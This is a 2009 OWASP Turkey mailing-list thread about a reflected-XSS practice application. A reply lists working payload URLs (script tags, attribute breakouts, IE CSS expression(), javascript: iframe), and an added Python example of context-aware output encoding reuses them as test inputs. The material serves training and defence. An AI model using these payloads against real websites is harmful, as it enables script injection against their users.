1) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=</a>&lt;script&gt;alert(1)&lt;%2Fscript&gt;<div><br>2) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=</a>&lt;div&quot;&quot;&gt;&lt;script&gt;alert(1)&lt;%2Fscript&gt;</div>
<div><br>3) only works in IE7 and IE6 when you write xss:expression(alert(1))</div><div><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=xss%3Aexpression(alert(1))&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=xss%3Aexpression(alert(1))&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=</a></div>
<div><br></div><div>4) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E&amp;vector5=&amp;vector6=&amp;vector7=</a></div>
<div><br></div><div>5) <a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3Ciframe+src%3Djavascript%3Aalert(1)%3E%3C%2Fiframe%3E&amp;vector6=&amp;vector7=">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=%3Ciframe+src%3Djavascript%3Aalert(1)%3E%3C%2Fiframe%3E&amp;vector6=&amp;vector7=</a></div>
<div><br></div><div>6) There is surely a simple way, but I couldn't find it :))<br><br>7) #444;background-image: expression(alert(1)); again works in IE7 and IE6</div><div><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=%23444%3Bbackground-image%3A+expression(alert(1))">http://www.webguvenligi.org/xsstb/reflected.php?vector1=&amp;vector2=&amp;vector3=&amp;vector4=&amp;vector5=&amp;vector6=&amp;vector7=%23444%3Bbackground-image%3A+expression(alert(1))</a></div>
<div><br></div><div>Is it necessary to get 7 out of 7? :P<br><br><div class="gmail_quote">2009/6/15 Bedirhan Urgun <span dir="ltr">&lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;</span><br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">
<div>Hello,</div>
<div>You can access a &quot;playground&quot; application where you can learn and practise different Reflected XSS techniques at <a href="http://www.webguvenligi.org/xsstb/reflected.php" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php</a>.</div>


<div>The application has XSS attack vectors that can be applied to 7 parameters (vector1, vector2, ..., vector7). To the first two people who exploit these vectors and, as a reply-all to this mail, send a link like the one I give below;</div>
<div> </div>
<div>To the 1st: a 7-day, 7-night trip for 2 to the Maldives</div>
<div>To the 2nd: a latest-model car   </div>
<div> </div>
<div>No way, what next!... </div>
<div> </div>
<div>To the 1st: an OWASP Membership T-Shirt (L)</div>
<div>To the 2nd: an OWASP Membership DVD</div>
<div> </div>
<div>I will send these.</div>
<div> </div>
<div>Example; (the first hint is on me)</div>
<div><a href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E" target="_blank">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a></div>

<div> </div>
<div> </div>
<div>Note 1: it is enough to print 1 inside an alert box on the screen</div>
<div>Note 2: what matters is the order of arrival in the owasp-tr mail archives</div>
<div>Note 3: the gifts I wrote last are the valid ones! no saying &quot;oh, I didn't see that&quot; afterwards</div>
<div> </div>
<div>Project Post: <a href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html" target="_blank">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a></div>
<div></div>-- <br><font color="#888888">Bedirhan Urgun<br><a href="http://www.webguvenligi.org" target="_blank">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey" target="_blank">http://www.owasp.org/index.php/Turkey</a><br>
<br>To subscribe to the Turkish Web Application Security E-Mail List: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
</font><br>_______________________________________________<br>
Owasp-turkey mailing list<br>
<a href="mailto:Owasp-turkey@lists.owasp.org">Owasp-turkey@lists.owasp.org</a><br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
<br></blockquote></div><br><br clear="all"><br>-- <br>Çağdaş Emek<br>Software Engineer<br><a href="http://www.linkedin.com/in/keramet">http://www.linkedin.com/in/keramet</a> <br>
</div>
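The thread above exercises five different reflection contexts (an HTML text node, an attribute value, a CSS declaration, an inline script block and a URL attribute), and the reply shows that a single filter does not cover them: the CSS vectors need no <code>&lt;</code> or quotes at all. The following is an added example, not code from the thread or from the webguvenligi.org application, of context-aware output encoding on the server side. The function names, the five context labels and the <code>render</code>/<code>is_neutralised</code> helpers are assumptions; the sample inputs are the payloads quoted in the thread, used only to confirm that each encoder neutralises its context.

```python
"""Context-aware output encoding for reflected parameters.

Added example for this thread; not code from the original messages or from
the webguvenligi.org application. Function names and context labels are
assumptions. The sample inputs are the payloads quoted in the thread.
"""
import html
import re
from urllib.parse import urlsplit

# Constructed test inputs: the vectors discussed in the thread, one per context.
SAMPLE_PAYLOADS = {
    "body": "<script>alert(1)</script>",
    "attribute": '<div""><script>alert(1)</script>',
    "css_value": "xss:expression(alert(1))",
    "js_string": "--></SCRIPT>\">'><SCRIPT>alert(1)</SCRIPT>",
    "url": "javascript:alert(1)",
}


def encode_html_body(value: str) -> str:
    """Text node inside an element: entity-encode the HTML metacharacters."""
    return html.escape(value, quote=True)


def encode_html_attribute(value: str) -> str:
    """Value inside a quoted attribute: same entities; the template must
    always quote the attribute so a stray quote cannot end it early."""
    return html.escape(value, quote=True)


# Shapes a colour, length or keyword value may take; nothing else is accepted.
_CSS_SAFE = re.compile(r"(#[0-9a-fA-F]{3,6}|[0-9]+(px|em|%)?|[a-zA-Z-]+)")


def encode_css_value(value: str) -> str:
    """Value dropped into a style declaration. Entity-encoding does not help
    here because IE's expression() needs no '<' or quotes, so the value is
    allow-listed by shape and replaced with a neutral keyword otherwise."""
    return value if _CSS_SAFE.fullmatch(value) else "inherit"


def encode_js_string(value: str) -> str:
    """Value inside a JavaScript string literal in an inline <script>:
    hex-escape every character outside a small alphabet so neither quotes
    nor '</script>' can terminate the literal or the script block."""
    out = []
    for ch in value:
        if ch.isalnum() or ch in " ,.":
            out.append(ch)
        elif ord(ch) < 256:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def encode_url_attribute(value: str) -> str:
    """Value used as an href/src: strip control characters, accept only
    http(s) or scheme-less URLs, then attribute-encode the result."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    if urlsplit(cleaned).scheme.lower() not in ("", "http", "https"):
        return "about:blank"
    return html.escape(cleaned, quote=True)


ENCODERS = {
    "body": encode_html_body,
    "attribute": encode_html_attribute,
    "css_value": encode_css_value,
    "js_string": encode_js_string,
    "url": encode_url_attribute,
}


def render(context: str, value: str) -> str:
    """Encode a reflected value for the named output context."""
    return ENCODERS[context](value)


def is_neutralised(context: str, value: str) -> bool:
    """True when the encoded form can no longer break out of its context."""
    encoded = render(context, value)
    return (
        encoded != value
        and "<" not in encoded
        and '"' not in encoded
        and "expression(" not in encoded
        and not encoded.lower().startswith("javascript:")
    )


def all_samples_neutralised() -> bool:
    """Run every sample payload through the encoder for its own context."""
    return all(is_neutralised(ctx, raw) for ctx, raw in SAMPLE_PAYLOADS.items())


if __name__ == "__main__":
    for ctx, raw in SAMPLE_PAYLOADS.items():
        print(f"{ctx:10} {raw!r:48} -> {render(ctx, raw)!r}")
```

The CSS encoder is deliberately the odd one out: it rejects rather than escapes, because a style value that reaches the browser unchanged is the vulnerability, and a colour such as <code>#444</code> followed by a second declaration is exactly the case where escaping <code>&lt;</code> would have passed the payload through. Values with spaces (for example a shorthand border) would also be rejected, so in a real template each style property gets its own allow-list.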